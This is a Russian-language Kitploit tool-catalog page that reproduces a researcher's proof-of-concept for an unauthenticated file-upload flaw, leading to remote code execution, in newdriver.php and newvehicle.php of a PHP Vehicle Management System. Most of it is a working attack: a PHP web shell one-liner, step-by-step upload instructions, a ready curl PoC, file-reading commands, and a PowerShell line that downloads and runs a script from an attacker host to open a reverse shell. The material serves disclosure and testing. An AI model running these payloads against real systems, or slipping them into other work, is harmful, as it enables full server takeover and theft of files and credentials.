Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-11344-RCE — Неаутентифицированный эксплойт удалённого выполнения кода для Vehicle Management System на PHP через неограниченную загрузку файлов в newdriver.php и newvehicle.php, с PoC и подробными шагами воспроизведения. | Kitploit
Инструменты/GitHubGitHub/xmyronn/cve-2026-11344-rce
Генерация полезной нагрузкиАнализ уязвимостейАнализ КодаЭксплуатацияЭксплуатация веб-приложенийСбор информацииВеб-безопасностьТестирование на Проникновение
GitHubxmyronn/cve-2026-11344-rce

CVE-2026-11344-RCE

Неаутентифицированный эксплойт удалённого выполнения кода для Vehicle Management System на PHP через неограниченную загрузку файлов в newdriver.php и newvehicle.php, с PoC и подробными шагами воспроизведения.

23 месяцев назадЕщё не проверено
Репозиторий

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Система управления транспортными средствами на PHP - Неавторизованное удаленное выполнение кода через загрузку файла в newdriver.php

Информация об уязвимости

ПолеПодробности
ПродуктСистема управления транспортными средствами на PHP
Вендорcode-projects.org
ВерсияV1.0
Тип уязвимостиНеограниченная загрузка файлов, ведущая к удаленному выполнению кода (CWE-434)
Затронутые файлыnewdriver.php, newvehicle.php
Параметрphoto (POST, multipart/form-data)
Требуется аутентификацияНет (неавторизованный)
Оценка CVSS10.0 Критический
Вектор атакиУдаленный / Сеть
Требуемые привилегииНет
Взаимодействие с пользователемНет

Описание

Система управления транспортными средствами на PHP V1.0 от code-projects.org уязвима для неавторизованного удаленного выполнения кода через неограниченную загрузку файлов в newdriver.php (и идентично в newvehicle.php).

Приложение предоставляет форму регистрации «Новый водитель», предназначенную только для администратора, по адресу newdriver.php, которая включает поле загрузки фотографии. Однако конечная точка не выполняет проверку сессии — любой неавторизованный злоумышленник может напрямую получить к ней доступ без перенаправления на страницу входа. Кроме того, поле загрузки фотографии принимает любые типы файлов, включая PHP-файлы, без фильтрации расширений, проверки MIME-типа или проверки содержимого.

Злоумышленник может:

  1. Напрямую перейти к newdriver.php без какой-либо сессии или учетных данных
  2. Отправить форму водителя с PHP-веб-шеллом в качестве «фото»
  3. Шелл сохраняется в каталог /picture/
  4. Перейти к загруженному шеллу и выполнить произвольные команды ОС на сервере

Это приводит к полному удаленному выполнению кода с привилегиями процесса веб-сервера.


Цепочка уязвимости

root@kitploit:~
Неавторизованный HTTP-запрос
        ↓
newdriver.php (без проверки сессии)
        ↓
Поле photo принимает .php файл (без проверки типа файла)
        ↓
Шелл сохраняется в /picture/web_shell.php
        ↓
GET /picture/web_shell.php?cmd=whoami
        ↓
RCE — выполнение произвольных команд ОС

Шаги по воспроизведению

Шаг 1 — Подтверждение неавторизованного доступа к newdriver.php

Откройте новый браузер без сессии (окно инкогнито/приватное). Перейдите напрямую к конечной точке:

root@kitploit:~
http://TARGET/VEHICLE_MANAGEMENT_SYSTEM_IN_PHP_WITH_SOURCE_CODE/newdriver.php

Форма «Новый водитель» загружается успешно без проверки аутентификации и без перенаправления на страницу входа.

Скриншот 2026-05-19 175610

Шаг 2 — Подготовка PHP-веб-шелла

Создайте простой PHP-веб-шелл для выполнения команд:

root@kitploit:~
<?php system($_GET['cmd']); ?>

Сохраните его как shell.php (или любое другое имя с расширением .php).


Шаг 3 — Отправка формы с веб-шеллом в качестве фотографии

Заполните поля формы водителя любыми значениями и выберите PHP-веб-шелл для загрузки фотографии:

root@kitploit:~
Имя водителя:        test
Мобильный:             1234567890
Дата приема водителя: 2026-05-19
Национальный ID:        test
Номер лицензии:         test
Дата окончания лицензии:   2026-05-30
Адрес водителя:     test
Фото:              shell.php   ← PHP-веб-шелл загружен сюда

Нажмите Отправить запрос.

Скриншот 2026-05-19 175622
Скриншот 2026-05-19 175708

Шаг 4 — Загрузка шелла подтверждена

Приложение отвечает сообщением «Регистрация завершена!» — подтверждающим, что PHP-шелл был принят и сохранен без какой-либо проверки.

Скриншот 2026-05-19 175718

Шаг 5 — Выполнение произвольных команд через загруженный шелл

Перейдите к загруженному шеллу в каталоге /picture/ и передайте команды ОС через параметр cmd:

root@kitploit:~
http://TARGET/VEHICLE_MANAGEMENT_SYSTEM_IN_PHP_WITH_SOURCE_CODE/picture/shell.php?cmd=whoami

Сервер выполняет команду и возвращает вывод:

root@kitploit:~
desktop-g1i9np3\dell
Скриншот 2026-05-19 175759

Шаг 6 — Дополнительные примеры выполнения команд

root@kitploit:~
# Read sensitive files
http://TARGET/.../picture/shell.php?cmd=type+C:\xampp\htdocs\VEHICLE_MANAGEMENT_SYSTEM_IN_PHP_WITH_SOURCE_CODE\newdriver.php

# List web root
http://TARGET/.../picture/shell.php?cmd=dir+C:\xampp\htdocs\

# Full reverse shell via PowerShell
http://TARGET/.../picture/shell.php?cmd=powershell+-c+"IEX(New-Object+Net.WebClient).DownloadString('http://ATTACKER/shell.ps1')"

Второй затронутый конечный пункт — newvehicle.php

Идентичная уязвимость существует в newvehicle.php. Неавторизованный злоумышленник может получить доступ к форме добавления нового транспортного средства, загрузить PHP-веб-шелл через поле фотографии транспортного средства и добиться RCE тем же методом.

root@kitploit:~
http://TARGET/VEHICLE_MANAGEMENT_SYSTEM_IN_PHP_WITH_SOURCE_CODE/newvehicle.php

Обе конечные точки имеют одну и ту же первопричину: отсутствие проверки сессии и ограничений на загрузку файлов.


curl PoC (однострочник)

root@kitploit:~
curl -s -X POST \
  "http://TARGET/VEHICLE_MANAGEMENT_SYSTEM_IN_PHP_WITH_SOURCE_CODE/newdriver.php" \
  -F "dname=test" \
  -F "mobile=1234567890" \
  -F "djoiningdate=2026-05-19" \
  -F "nid=test" \
  -F "licenseno=test" \
  -F "licenseenddate=2026-05-30" \
  -F "daddress=test" \
  -F "[email protected];type=image/jpeg" \
  && echo "[+] Shell uploaded" \
  && curl -s "http://TARGET/VEHICLE_MANAGEMENT_SYSTEM_IN_PHP_WITH_SOURCE_CODE/picture/shell.php?cmd=whoami"

Воздействие

  • Неавторизованное удаленное выполнение кода — любой анонимный злоумышленник в сети получает полное выполнение команд ОС
  • Полная компрометация сервера — чтение/запись всех файлов, учетных данных, конфигурации базы данных
  • Не требуется взаимодействие — полностью автоматизированная эксплуатация в одном HTTP-запросе
  • Два затронутых конечных пункта — newdriver.php и newvehicle.php оба уязвимы

Затронутые файлы

ФайлПоле загрузкиПуть хранения шелла
newdriver.phpphoto/picture/
newvehicle.phpphoto/picture/

Информация о вендоре

  • Сайт вендора: https://code-projects.org/vehicle-management-system-in-php-with-source-code/
  • Скачать: https://code-projects.org/vehicle-management-system-in-php-with-source-code/

Обнаружено

Syed Imad Uddin Alvi (imad alvi)
Независимый исследователь безопасности

Скачать инструмент